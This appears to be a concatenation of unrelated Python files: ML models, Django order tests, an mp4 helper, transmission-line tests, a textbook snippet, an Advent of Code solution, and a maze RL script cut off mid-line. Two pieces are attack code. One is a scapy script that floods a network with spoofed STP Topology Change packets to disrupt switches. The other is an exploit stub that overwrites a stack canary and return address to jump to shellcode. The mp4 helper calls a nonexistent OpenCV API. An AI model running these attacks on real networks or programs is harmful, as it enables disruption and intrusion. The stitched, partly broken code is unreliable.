# -*- coding: utf-8 -*- from scapy.layers.l2 import Dot3, LLC, STP from scapy.all import sendp, RandMAC # -------------------------------------------------------------------------- # STP TCN ATTACK # -------------------------------------------------------------------------- def run(inter): """ This function launch STP TCN ATTACK :param inter: interface to be launched the attack :type inter: str """ interface = str(inter[0]) if len(interface) > 0: try: while 1: # dst=Ethernet Multicast address used for spanning tree protocol srcMAC = str(RandMAC()) # Random MAC in each iteration p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC) p_llc = LLC() p_stp = STP(bpdutype=0x80) # TCN packet pkt = p_ether/p_llc/p_stp # STP packet structure sendp(pkt, iface=interface, verbose=0) except KeyboardInterrupt: pass def run_attack(config): """ This function is used for launch the STP TCN attack :param config: GlobalParameters option instance :type config: `GlobalParameters` """ run(config.interface)
python
# define self-attention # simply modify the code for this paper A Structured Self-Attentive Sentence Embedding class StructuredSelfAttention(torch.nn.Module): def __init__(self, batch_size, lstm_hid_dim, d_a, r, max_len, emb_dim=128, vocab_size=None, use_pretrained_embeddings = False, embeddings=None, type=1, n_classes = 4, bidirectional=True): """ Initializes parameters Args: batch_size : {int} batch_size used for training lstm_hid_dim: {int} hidden dimension for lstm d_a : {int} hidden dimension for the dense layer r : {int} attention-hops or attention heads max_len : {int} number of lstm timesteps emb_dim : {int} embeddings dimension vocab_size : {int} size of the vocabulary use_pretrained_embeddings: {bool} use or train your own embeddings embeddings : {torch.FloatTensor} loaded pretrained embeddings type : [0,1] 0-->binary_classification 1-->multiclass classification n_classes : {int} number of classes Returns: self Raises: Exception """ super(StructuredSelfAttention,self).__init__() self.emb_dim = emb_dim self.embeddings= nn.Embedding(vocab_size, emb_dim) self.lstm = torch.nn.LSTM(emb_dim, lstm_hid_dim, 1, batch_first=True, bidirectional=True) if bidirectional: self.bi_num=2 else: self.bi_num=1 self.linear_first = torch.nn.Linear(self.bi_num*lstm_hid_dim, d_a) self.linear_first.bias.data.fill_(0) self.linear_second = torch.nn.Linear(d_a, r) self.linear_second.bias.data.fill_(0) self.n_classes = n_classes self.linear_final = torch.nn.Linear(self.bi_num*lstm_hid_dim, self.n_classes) self.batch_size = batch_size self.max_len = max_len self.lstm_hid_dim = lstm_hid_dim self.hidden_state = self.init_hidden() self.r = r self.type = type def softmax(self, input, axis=1): input_size = input.size() trans_input = input.transpose(axis, len(input_size)-1) trans_size = trans_input.size() input_2d = trans_input.contiguous().view(-1, trans_size[-1]) soft_max_2d = F.softmax(input_2d) soft_max_nd = soft_max_2d.view(*trans_size) return soft_max_nd.transpose(axis, len(input_size)-1) def init_hidden(self): return (Variable(torch.zeros(2,self.batch_size,self.lstm_hid_dim).cuda()), Variable(torch.zeros(2,self.batch_size,self.lstm_hid_dim).cuda())) def forward(self, x): embeddings = self.embeddings(x) outputs, self.hidden_state = self.lstm(embeddings, self.hidden_state) x = F.tanh(self.linear_first(outputs)) x = self.linear_second(x) x = self.softmax(x, 1) attention = x.transpose(1, 2) sentence_embeddings = attention@outputs avg_sentence_embeddings = torch.sum(sentence_embeddings,1)/self.r if not bool(self.type): output = F.sigmoid(self.linear_final(avg_sentence_embeddings)) return output, attention else: return F.log_softmax(self.linear_final(avg_sentence_embeddings)), attention # run this #Regularization def l2_matrix_norm(self, m): """ Frobenius norm calculation """ return torch.sum(torch.sum(torch.sum(m**2,1),1)**0.5).type(torch.DoubleTensor).cuda()
python
from django.test import override_settings from django.utils import timezone from hotels.models import HotelRoomReservation from pretix.exceptions import PretixError from pytest import mark def test_cannot_create_order_unlogged(graphql_client, user, conference, mocker): response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { ... on CreateOrderResult { paymentUrl } } }""", variables={ "code": conference.code, "input": { "tickets": [ { "ticketId": "1", "attendeeName": "ABC", "attendeeEmail": "[email protected]", "variation": "1", "answers": [{"questionId": "1", "value": "Example"}], } ], "hotelRooms": [], "paymentProvider": "stripe", "email": "[email protected]", "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert response["errors"][0]["message"] == "User not logged in" @override_settings(FRONTEND_URL="http://test.it") def test_calls_create_order(graphql_client, user, conference, mocker): graphql_client.force_login(user) create_order_mock = mocker.patch("api.orders.mutations.create_order") create_order_mock.return_value.payment_url = "https://example.com" create_order_mock.return_value.code = "123" response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { ... on CreateOrderResult { paymentUrl } } }""", variables={ "code": conference.code, "input": { "tickets": [ { "ticketId": "1", "attendeeName": "ABC", "attendeeEmail": "[email protected]", "variation": "1", "answers": [{"questionId": "1", "value": "Example"}], } ], "hotelRooms": [], "paymentProvider": "stripe", "email": "[email protected]", "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["paymentUrl"] == ( "https://example.com?return_url=http://test.it/en/orders/123/confirmation" ) create_order_mock.assert_called_once() @override_settings(FRONTEND_URL="http://test.it") def test_handles_payment_url_set_to_none(graphql_client, user, conference, mocker): graphql_client.force_login(user) create_order_mock = mocker.patch("api.orders.mutations.create_order") # this happens when the order is free create_order_mock.return_value.payment_url = None create_order_mock.return_value.code = "123" response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { ... on CreateOrderResult { paymentUrl } } }""", variables={ "code": conference.code, "input": { "tickets": [ { "ticketId": "1", "attendeeName": "ABC", "attendeeEmail": "[email protected]", "variation": "1", "answers": [{"questionId": "1", "value": "Example"}], } ], "hotelRooms": [], "paymentProvider": "stripe", "email": "[email protected]", "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["paymentUrl"] == ( "http://test.it/en/orders/123/confirmation" ) create_order_mock.assert_called_once() def test_handles_errors(graphql_client, user, conference, mocker): graphql_client.force_login(user) create_order_mock = mocker.patch("api.orders.mutations.create_order") create_order_mock.side_effect = PretixError("Example") response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [ { "attendeeName": "ABC", "attendeeEmail": "[email protected]", "ticketId": "1", "variation": "1", } ], "hotelRooms": [], "paymentProvider": "stripe", "email": "[email protected]", "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["message"] == "Example" create_order_mock.assert_called_once() @override_settings(FRONTEND_URL="http://test.it") @mark.django_db def test_order_hotel_room( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) create_order_mock = mocker.patch("api.orders.mutations.create_order") create_order_mock.return_value.payment_url = "https://example.com" create_order_mock.return_value.code = "123" room = hotel_room_factory(conference=conference) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { ... on CreateOrderResult { paymentUrl } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": str(room.id), "checkin": "2020-01-01", "checkout": "2020-01-10", } ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["paymentUrl"] == ( "https://example.com?return_url=http://test.it/en/orders/123/confirmation" ) reservation = HotelRoomReservation.objects.filter(room=room).first() assert reservation.user == user assert reservation.checkin == timezone.datetime(2020, 1, 1).date() assert reservation.checkout == timezone.datetime(2020, 1, 10).date() create_order_mock.assert_called_once() def test_cannot_order_hotel_room_with_checkin_before_conference( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) create_order_mock = mocker.patch("api.orders.mutations.create_order") room = hotel_room_factory(conference=conference) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { __typename ... on CreateOrderResult { paymentUrl } ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": str(room.id), "checkin": "2019-01-01", "checkout": "2019-01-10", } ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["__typename"] == "Error" assert response["data"]["createOrder"]["message"] == "Invaild check-in date" create_order_mock.assert_not_called() def test_cannot_order_hotel_room_with_checkin_after_conference( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) create_order_mock = mocker.patch("api.orders.mutations.create_order") room = hotel_room_factory(conference=conference) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { __typename ... on CreateOrderResult { paymentUrl } ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": str(room.id), "checkin": "2020-01-20", "checkout": "2020-01-22", } ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["__typename"] == "Error" assert response["data"]["createOrder"]["message"] == "Invaild check-in date" create_order_mock.assert_not_called() def test_cannot_order_hotel_room_with_checkout_after_conference( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) create_order_mock = mocker.patch("api.orders.mutations.create_order") room = hotel_room_factory(conference=conference) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { __typename ... on CreateOrderResult { paymentUrl } ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": str(room.id), "checkin": "2020-01-02", "checkout": "2020-01-22", } ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["__typename"] == "Error" assert response["data"]["createOrder"]["message"] == "Invaild check-out date" create_order_mock.assert_not_called() def test_cannot_order_hotel_room_with_checkout_before_the_checkin( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) create_order_mock = mocker.patch("api.orders.mutations.create_order") room = hotel_room_factory(conference=conference) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { __typename ... on CreateOrderResult { paymentUrl } ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": str(room.id), "checkin": "2020-01-05", "checkout": "2020-01-03", } ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["__typename"] == "Error" assert response["data"]["createOrder"]["message"] == "Invaild check-out date" create_order_mock.assert_not_called() def test_cannot_order_room_with_random_room_id( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) create_order_mock = mocker.patch("api.orders.mutations.create_order") hotel_room_factory(conference=conference) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { __typename ... on CreateOrderResult { paymentUrl } ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": "94990540", "checkin": "2020-01-05", "checkout": "2020-01-03", } ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["__typename"] == "Error" assert response["data"]["createOrder"]["message"] == "Room 94990540 not found" create_order_mock.assert_not_called() def test_cannot_order_sold_out_room( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) create_order_mock = mocker.patch("api.orders.mutations.create_order") room = hotel_room_factory(conference=conference, total_capacity=0) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { __typename ... on CreateOrderResult { paymentUrl } ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": str(room.id), "checkin": "2020-01-05", "checkout": "2020-01-03", } ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["__typename"] == "Error" assert response["data"]["createOrder"]["message"] == f"Room {room.id} is sold out" create_order_mock.assert_not_called() def test_cannot_order_room_of_a_different_conference( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) create_order_mock = mocker.patch("api.orders.mutations.create_order") room = hotel_room_factory(total_capacity=5) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { __typename ... on CreateOrderResult { paymentUrl } ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": str(room.id), "checkin": "2020-01-05", "checkout": "2020-01-03", } ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["__typename"] == "Error" assert response["data"]["createOrder"]["message"] == f"Room {room.id} not found" create_order_mock.assert_not_called() def test_cannot_buy_more_room_than_available( graphql_client, hotel_room_factory, user, conference_factory, mocker ): graphql_client.force_login(user) create_order_mock = mocker.patch("api.orders.mutations.create_order") create_order_mock.return_value.payment_url = "https://example.com" create_order_mock.return_value.code = "123" conference = conference_factory( start=timezone.make_aware(timezone.datetime(2020, 1, 1)), end=timezone.make_aware(timezone.datetime(2020, 1, 10)), ) room = hotel_room_factory(conference=conference, total_capacity=2) response = graphql_client.query( """mutation CreateOrder($code: String!, $input: CreateOrderInput!) { createOrder(conference: $code, input: $input) { __typename ... on CreateOrderResult { paymentUrl } ... on Error { message } } }""", variables={ "code": conference.code, "input": { "tickets": [], "paymentProvider": "stripe", "email": "[email protected]", "hotelRooms": [ { "roomId": str(room.id), "checkin": "2020-01-05", "checkout": "2020-01-06", }, { "roomId": str(room.id), "checkin": "2020-01-05", "checkout": "2020-01-06", }, { "roomId": str(room.id), "checkin": "2020-01-05", "checkout": "2020-01-06", }, ], "invoiceInformation": { "isBusiness": False, "company": "", "name": "Patrick", "street": "", "zipcode": "92100", "city": "Avellino", "country": "IT", "vatId": "", "fiscalCode": "", }, "locale": "en", }, }, ) assert not response.get("errors") assert response["data"]["createOrder"]["__typename"] == "Error" assert response["data"]["createOrder"]["message"] == "Too many rooms" create_order_mock.assert_not_called()
python
import io import cv2 import fs import fs.memoryfs import numpy as np import matplotlib.pyplot as plt class ramp4(): """ INTRODUCTION ------------ A simple library to make mp4 movies with matplotlib.pyplot. It use RAM instead of disk storage for the temporary images. HOW TO USE ----------- 1) Get an instance of ramp4. 2) Add image with matplotlib using the 'add' method. 3) Render the movie using the 'render' method. 4) Done """ def __init__(self): self.cpt = 1 self.mem = fs.memoryfs.MemoryFS() def add(self, figure=None, dpi=150): """ Add the following image to the movie. The image has to be previously generated with matplotlib.pyplot using pyplot method or OOP. Parameters: ----------- fig : None or matplotlib.pyplot.figure If matplotlib.pyplot OOP is used then put the figure object in this parameter. If None is provided, the matplotlib.pyplot's method 'pyplot.savefig' will be use to get the byte of the image. The correct way should be selected depending of the way matplotlib is used. dpi : int The pixel density of the image. Should be a positive integer. """ buf = io.BytesIO() if figure is None: plt.savefig(buf, format="jpg", dpi=dpi) else: figure.savefig(buf, format="jpg", dpi=dpi) buf.seek(0) self.mem.writebytes("{:0>25}".format(self.cpt), buf.read()) self.cpt += 1 def render(self, outfile="movie.mp4", fps=20, close=True): """ Render the final movie and save it. Parameters: ----------- outfile : string The path and name of the movie. The extension should be 'mp4'. fps : int Frames per second. Should be a positive integer. close : bool If True, close the RAM filesystem after rendering. """ images = self.mem.listdir(".") height, width, _ = self.bytes2img(self.mem.getbytes(images[0])).shape movie = cv2.movieWriter(outfile, cv2.movieWriter_fourcc(*'mp4v'), fps, (width, height)) for image in images: print("{0} / {1}".format(int(image), len(images))) movie.write(self.bytes2img(self.mem.getbytes(image))) cv2.destroyAllWindows() if close: self.close() def close(self): """ Close the RAM filesystem. """ self.mem.close() @staticmethod def bytes2img(bytes): """Convert a bytes image to openCV image. Parameters: ----------- bytes : bytes Input containing the image bytes. """ return cv2.imdecode(np.frombuffer(bytes, dtype='uint8'), cv2.IMREAD_UNCHANGED)
python
table_config = [ { 'field': None, 'title': '选择', 'display': True, 'text': { 'tpl': '<input type="checkbox" value="{n1}" />', 'kwargs': { 'n1': '@id', } }, 'attrs': { 'nid': '@id', } }, { 'field': 'id', 'title': 'ID', 'display': False, 'text': { 'tpl': '{n1}', 'kwargs': { 'n1': '@id', } }, 'attrs': { 'k1': '@id', 'k2': 'v2', } }, { 'field': 'name', 'title': '机房', 'display': True, 'text': { 'tpl': '{n1}', 'kwargs': { 'n1': '@name', } }, 'attrs': { 'name': 'name', 'origin': '@name', 'edit-enable': 'true', }, }, { 'field': 'floor', 'title': '楼层', 'display': True, 'text': { 'tpl': '{n1}', 'kwargs': { 'n1': '@floor', } }, 'attrs': { 'name': 'floor', 'origin': '@floor', 'edit-enable': 'true', }, }, { 'field': None, 'title': '操作', 'display': True, 'text': { 'tpl': "<a href='/del?nid={nid}'>删除</a>", 'kwargs': { 'nid': '@id', } }, 'attrs': { 'k1': '@id', 'k2': 'v2', } }, ]
python
#!/usr/bin/python2 import sys import time fh = open(sys.argv[1], 'rb') stage_2 = fh.read() fh.close() sploit = [ '\x00', '\x00', # r7 '\x30', '\x30', # r6 '\x31', '\x31', # r5 '\x32', '\x32', # r3 '\x34', '\x33', # r2 '\x34', '\x34', # r1 '\x00', '\x0A', # canary '\x35', '\x35', # rbp '\x02', '\x2E', # ret '\x20', '\x00', # ret to shellcode '\x20', '\x00', # arg0 to input_read '\x04', '\x00', # arg1 to input_read ] sploit = ''.join(sploit) sys.stdout.write(sploit) sys.stdout.flush() time.sleep(1) sys.stdout.write(stage_2) sys.stdout.flush()
python
#!/usr/bin/python3 import cmath import numpy as np import pytest from pytest import approx from emtoolbox.tline.tline import TLine from emtoolbox.tline.mtl_network import MtlNetwork def pol2rect(mag, deg): return cmath.rect(mag, np.deg2rad(deg)) @pytest.mark.parametrize( "f", [ 5e6, np.array([5e6]), np.array([5e6, 5e6]), np.array([5e6, 5e6, 5e6]), ], ) def test_network1_simple(f): # Paul MTL P6.3 vp = 3e8 zc = 50 zs = 20 - 30j zl = 200 + 500j length = 78 tline = TLine.create_lowloss(zc, freq=f, vp=vp, length=length) network = MtlNetwork(tline, zs, zl) assert tline.n_wavelengths() == approx(1.3, rel=0.001) assert network.reflection() == approx(pol2rect(0.9338, 9.866), rel=0.001) assert network.reflection(0) == approx(pol2rect(0.9338, 153.9), rel=0.001) assert network.input_impedance() == approx(pol2rect(11.73, 81.16), rel=0.001) @pytest.mark.parametrize( "f", [ 5e6, np.array([5e6]), np.array([5e6, 5e6]), np.array([5e6, 5e6, 5e6]), ], ) def test_network1_solve(f): # Paul MTL P6.3 vp = 3e8 zc = 50 zs = 20 - 30j zl = 200 + 500j length = 78 vs = 50 tline = TLine.create_lowloss(zc, freq=f, vp=vp, length=length) network = MtlNetwork(tline, zs, zl) sol = network.solve(vs) assert network.get_voltage(sol, 0) == approx(pol2rect(20.55, 121.3), rel=0.001) assert network.get_voltage(sol, length) == approx(pol2rect(89.6, -50.45), rel=0.001) assert network.vswr() == approx(29.21, rel=0.001) @pytest.mark.parametrize( "zl, result", [ (50, 1.0), (100, 2.0), (10, 5.0), (0, np.inf) ], ) def test_vswr(zl, result): zc = 50 zs = 50 tline = TLine.create_lowloss(zc) network = MtlNetwork(tline, zs, zl) assert network.vswr() == approx(result, rel=0.001)
python
# Section 10.8.1 snippets # 10.8.1 Base Class CommissionEmployee # Testing Class CommissionEmployee from commissionemployee import CommissionEmployee from decimal import Decimal c = CommissionEmployee('Sue', 'Jones', '333-33-3333', Decimal('10000.00'), Decimal('0.06')) c print(f'{c.earnings():,.2f}') c.gross_sales = Decimal('20000.00') c.commission_rate = Decimal('0.1') print(f'{c.earnings():,.2f}') # 10.8.2 Subclass SalariedCommissionEmployee # Testing Class SalariedCommissionEmployee from salariedcommissionemployee import SalariedCommissionEmployee s = SalariedCommissionEmployee('Bob', 'Lewis', '444-44-4444', Decimal('5000.00'), Decimal('0.04'), Decimal('300.00')) print(s.first_name, s.last_name, s.ssn, s.gross_sales, s.commission_rate, s.base_salary) print(f'{s.earnings():,.2f}') s.gross_sales = Decimal('10000.00') s.commission_rate = Decimal('0.05') s.base_salary = Decimal('1000.00') print(s) print(f'{s.earnings():,.2f}') # Testing the "is a" Relationship issubclass(SalariedCommissionEmployee, CommissionEmployee) isinstance(s, CommissionEmployee) isinstance(s, SalariedCommissionEmployee) # Processing CommissionEmployees and SalariedCommissionEmployees Polymorphically employees = [c, s] for employee in employees: print(employee) print(f'{employee.earnings():,.2f}\n') ########################################################################## # (C) Copyright 2019 by Deitel & Associates, Inc. and # # Pearson Education, Inc. All Rights Reserved. # # # # DISCLAIMER: The authors and publisher of this book have used their # # best efforts in preparing the book. These efforts include the # # development, research, and testing of the theories and programs # # to determine their effectiveness. The authors and publisher make # # no warranty of any kind, expressed or implied, with regard to these # # programs or to the documentation contained in these books. The authors # # and publisher shall not be liable in any event for incidental or # # consequential damages in connection with, or arising out of, the # # furnishing, performance, or use of these programs. # ##########################################################################
python
""" solution AdventOfCode 2019 day 20 part 2. https://adventofcode.com/2019/day/20. author: pca """ from general.general import read_file, get_location_input_files, measure import matplotlib.pyplot as plt from collections import Counter import networkx as nx import heapq def to_grid(grid_txt): grid = dict() for y, line in enumerate(grid_txt): for x, ch in enumerate(line): grid[(y, x)] = ch return grid def node_distances(grid, node_positions, start_node): deltas = [(-1, 0), (1, 0), (0, -1), (0, 1)] visited = set() q = list() q.append((0, start_node)) while len(q) > 0: d, (y, x) = q.pop(0) if (y, x) in visited: continue visited.add((y, x)) # at a node with a code? if (y, x) in node_positions: yield d, (y, x) # neighbours for dy, dx in deltas: if grid[(y + dy, x + dx)] == '.': q.append((d + 1, (y + dy, x + dx))) def all_distances(nodes, grid): distances = dict() node_codes = set() for node_from in nodes.keys(): for (d, node_to) in node_distances(grid, nodes.keys(), node_from): node_code_from = nodes[node_from] node_code_to = nodes[node_to] if node_code_to != node_code_from: distances[(node_code_from, node_code_to)] = d node_codes.add(node_code_from) # setup the portals for node_code, idx in node_codes: if idx == 1: distances[(node_code, -1), (node_code, 1)] = 1 distances[(node_code, 1), (node_code, -1)] = 1 return distances, node_codes def read_nodes(grid): deltas = [((-2, 0), (-1, 0)), ((1, 0), (2, 0)), ((0, -2), (0, -1)), ((0, 1), (0, 2))] node_counter = Counter() nodes_positions = dict() # check for each grid location if it's a node. # nodes neighbour a capital letter. for y, x in grid: if grid[(y, x)] == '.': for ((dy1, dx1), (dy2, dx2)) in deltas: ch1 = grid[(y + dy1, x + dx1)] ch2 = grid[(y + dy2, x + dx2)] if ch1.isupper() and ch2.isupper(): node_str = ch1 + ch2 # check if it's an outer gate is_on_edge = (y == 2) or (x == 2) or (y, x + 3) not in grid or (y + 3, x) not in grid if node_str in ('AA', 'ZZ'): idx = 0 elif is_on_edge: idx = 1 else: idx = -1 nodes_positions[(y, x)] = (node_str, idx) return nodes_positions def solve(G): frontier = list() visited = set() heapq.heappush(frontier, (0, -1, ('AA', 0), [(('AA', 0), 0)])) while len(frontier) > 0: dimension, total_distance, node, path = heapq.heappop(frontier) if dimension < 0: continue if node in [('AA', 0), ('ZZ', 0)] and dimension != 0: continue if node == ('ZZ', 0) and dimension == 0: print(f"found: {total_distance}") return True, total_distance, path if (dimension, node) in visited: continue visited.add((dimension, node)) # we always go to the other side of the node node_code, node_delta = node check_node = node_code, -node_delta for neighbour in G.neighbors(check_node): neighbour_code, neighbour_delta = neighbour # make sure we don't go back right away on the same node. if node_code != neighbour_code: # count for movement to another dimension as well (+1). distance = G.edges[(check_node, neighbour)]['weight'] + 1 delta_dimension = -node_delta heapq.heappush(frontier, (dimension + delta_dimension, total_distance + distance, neighbour, path + [(neighbour, dimension + delta_dimension)])) return False, None, None @measure def main(args=None): grid_txt = read_file(get_location_input_files(), 'input_day20.txt') grid = to_grid(grid_txt) nodes = read_nodes(grid) distances, node_codes = all_distances(nodes, grid) G = nx.Graph() G.add_weighted_edges_from([(k[0], k[1], v) for k,v in distances.items()]) # draw graph positions = {v: k for k, v in nodes.items()} plt.figure(1, figsize=(12, 12)) nx.draw_networkx(G, node_size=50, pos=positions, with_labels=True, font_size=8, alpha=0.5) plt.show() res, total_distance, path = solve(G) print(f"Total distance: {total_distance}") if __name__ == "__main__": main()
python
#!/usr/bin/env python # encoding: utf-8 from maze import Maze from RL_brain import SarsaLambdaTable, QLambdaTable import numpy as np METHOD = "QLambda" def get_action(q_table, state): state_action = q_table.ix[state, :] state_action_max = state_action.max() idxs = [] for max_item in range(len(state_action)): if state_action[max_item] == state_action_max: idxs.append(max_item) sorted(idxs) return tuple(idxs) def get_policy(q_table, rows=6, cols=6, pixels=40, orign=20): policy = [] for i in range(rows): for j in range(cols): item_center_x, item_center_y = (j * pixels + orign), (i * pixels + orign) item_state = [item_center_x - 15.0, item_center_y - 15.0, item_center_x + 15.0, item_center_y + 15.0] # If the current state is each terminated state, the value is -1 if item_state in [env.canvas.coords(env.hell1), env.canvas.coords(env.hell2), env.canvas.coords(env.hell3), env.canvas.coords(env.hell4), env.canvas.coords(env.oval)]: policy.append(-1) continue if str(item_state) not in q_table.index: policy.append((0, 1, 2, 3)) continue item_action_max = get_action(q_table, str(item_state)) policy.append(item_action_max) return policy def judge(observation): ''' Determine whether the current state is in the secondary air duct :param observation: current state :return: ''' x = (observation[0] + observation[2]) / 2 # When the x is 140, it is a duct if x == 140: return True return False def update(): for episode in range(1000): observation = env.reset() # Select behavior based on current state action = RL.choose_action(str(observation)) # Initialize all eligibility_trace to 0 RL.eligibility_trace *= 0 while True: env.render() # In game,he position of the secondary wind will go up two squares, # Determine whether the current state is in the secondary air duct and the generated action is an upward motion if judge(observation) and action == 0: observation_, reward, done, oval_flag = env.step(action) # If the termination state occurs during the process, it ends directly if done: break # Direct assignment is continued upwards, and reward add action_ = 0 reward = 0.1 RL.learn(str(observation), action, reward, str(observation_), action_) observation = observation_ action = action_ # Take action from the current state to get the observation_, reward, done, oval_flag observation_, reward, done, oval_flag = env.step(action) # Based on the next state selection behavior action_ = RL.choose_action(str(observation_)) # If you go down the wind tunnel, you will do special treatment when you are not in the trap (to prevent the return of the wind tunnel to increase the reward) if judge(observation) and action == 1: reward = -0.1 RL.learn(str(observation), action, reward, str(observation_), action_) observation = observation_ action = action_ if done: break print('Game Over') q_table_result = RL.q_table policy = get_policy(q_table_result) print("The optimal strategy is", end=":") print(policy) print("Draw Policy", end=":") policy_result = np.array(policy).reshape(5, 5) print(policy_result) print("Drawing path: ") env.render_by_policy(policy_result) if __name__ == "__main__": env = Maze() RL = SarsaLambdaTable(actions=list(range(env.n_actions))) if METHOD == "QLambda": RL = 